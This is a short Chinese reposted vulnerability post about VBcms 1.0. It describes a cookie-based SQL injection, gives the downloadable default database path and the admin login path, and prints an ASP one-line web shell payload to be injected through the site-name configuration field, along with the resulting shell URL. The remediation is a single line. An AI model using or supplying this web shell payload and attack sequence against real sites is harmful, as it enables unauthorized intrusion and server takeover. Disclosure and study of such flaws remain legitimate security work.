VBcms文章管理系统 1.0最新漏洞

2011-9-14 9:13:41 来源:网络转载 浏览:62
VBcms文章管理系统 1.0最新漏洞

Author:mer4en7y

下午遇到这个CMS,于是看了看代码

Check_SqlIn.asp防注入代码未过滤完全注入漏洞:

1)未对cookie方式进行过滤,cookie注入

2)默认数据库:
data/article.mdb


3)后台拿shell:
后台地址:admin/login.asp

系统配置-->网站名称处写入:"<script language=VBScript runat=server>eval request("1")</script>"

一句话地址:http://www.test.com/admin/config.asp

修复:
修改默认下载地址,过滤

(0)
(0)